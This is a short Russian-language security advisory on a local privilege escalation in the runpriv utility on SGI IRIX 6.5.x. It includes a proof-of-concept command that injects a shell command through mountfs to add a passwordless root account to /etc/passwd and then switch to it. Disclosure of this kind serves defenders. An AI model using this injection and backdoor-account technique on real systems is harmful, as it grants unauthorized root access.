Программа: SGI IRIX 6.5.22, 6.5.27 и 6.5.28

Уязвимость в утилите runpriv позволяет
локальному пользователю повысить свои
привилегии на системе. Уязвимость
существует в утилите runpriv из-за
небезопасного выполнения команд после
проверки привилегий пользователя.
Локальный пользователь с правами на запуск
приложений из директории /usr/sysadm/privbin, может
выполнить произвольные команды на системе
с привилегиями пользователя root.

Пример для пользователя с правами на
запуск утилиты mountfs:

/usr/sysadm/bin/runpriv mountfs -s test -d / -o \|
"ksh -c ‘echo r00t::0:0:r00t:/tmp:/bin/sh >> /etc/passwd’"
su r00t -c "chown root:sys /tmp/passwd123 ;
mv /tmp/passwd123 /etc/passwd ;
chmod 644 /etc/passwd ; su"



Оставить мнение